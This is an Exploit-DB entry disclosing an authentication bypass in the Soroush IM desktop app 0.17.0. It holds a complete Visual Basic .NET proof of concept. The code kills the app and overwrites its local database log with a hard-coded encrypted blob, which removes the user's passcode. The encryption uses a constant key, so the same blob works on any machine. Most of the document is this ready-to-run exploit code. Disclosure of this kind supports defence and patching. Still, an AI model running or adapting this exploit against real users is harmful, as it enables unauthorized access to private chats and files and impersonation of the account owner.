Soroush IM Desktop App 0.17.0 - Authentication Bypass

EDB-ID:

45171

CVE:

N/A




Platform:

Windows

Date:

2018-08-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

# Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass
# Date: 2018-08-08 
# Exploit Author: VortexNeoX64
# Vendor Homepage: https://soroush-app.ir
# Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
# Version: 0.17.0 BETA
# Tested on: Windows 10 1803 and windows server 2016 14393
 
# Security Issue:
# It seems that all databases are encrypted with a constant key and then producing same output 
# across every other PCs so pushing NO_PASSCODE data ,that was encrypted before, to the databases
# on any other PC, would process the database valid and remove the passcode. The database entriesd are first 
# entered in a log file in the same folder of the database, and then the Soroush app pushes the log file 
# into permanent database. Attacker can unlock the client app with database injection, and bypass the 
# authentication process. This exploit leads to two important security risks:

# 1.Attacker can access to all the data, chats, images, files and etc. then he/she is able to send and  receive data in behalf of the original user
# 2.Attacker then may use the exploit to perform an DOS attack. which is done by setting a new passcode for the client without knowing the previews passcode 

# PoC (.NET 4.0 Visual Basic)
# PoC dose not support Windows XP, try change "\users\" to "\Documents and Settings\" 

Module Module1

    Sub Main()
        Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***")
        Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***")
        Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **")
        Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sure  Windows] **")
        Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**")
        Console.WriteLine()
        Console.WriteLine("Press any Key to exploit...")
        Console.ReadKey()
        Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
                              1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77,
                              90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70,
                              65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109,
                              72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99,
                              107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75,
                              47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81,
                              61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105,
                              116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55,
                              106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85,
                              49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122,
                              105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47,
                              108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57,
                              97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49,
                              89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73,
                              43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116,
                              43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85,
                              87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113,
                              90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55,
                              117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52,
                              100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114,
                              75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77,
                              108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66,
                              97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111,
                              65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74,
                              84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83,
                              111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109,
                              73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49,
                              74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76,
                              110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50,
                              66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108,
                              111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67,
                              74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86,
                              84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66,
                              86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105,
                              120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67,
                              65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82,
                              73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80,
                              72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105,
                              68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101,
                              122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57,
                              48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57,
                              122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80,
                              81, 55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102,
                              117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71,
                              83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81,
                              101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104,
                              108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115,
                              87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114,
                              116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111,
                              69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61,
                              34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125}
        Try
            Console.WriteLine("Killing the app...")
            Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True)
            Console.WriteLine("Making malicious database...")
            Dim target As String = ""
            Dim targetname As String = ""
            Dim index As Integer = 0
            Dim _info As IO.FileInfo()
            Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\")
            IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp)
            Console.WriteLine("Getting orginal database name....")
            _info = _Dirinfo.GetFiles()
            For i = 0 To _info.Count - 1
                If _info(i).Extension = ".log" Then
                    target = _info(i).FullName
                    targetname = _info(i).Name
                    index = i
                    Exit For
                End If
            Next
            Console.WriteLine("Target file is : [" & target & "]")
            Console.WriteLine("Renaming malicious database to [" & targetname & "]")
            IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname)
            Console.WriteLine("injecting database [" & target & "]")
            Threading.Thread.Sleep(1500)
            IO.File.Delete(target)
            IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target)
            Console.WriteLine("Done!")
        Catch ex As Exception
            Console.WriteLine(ex.Message)
            Beep()
        Finally
            Console.ReadKey()
        End Try
    End Sub

End Module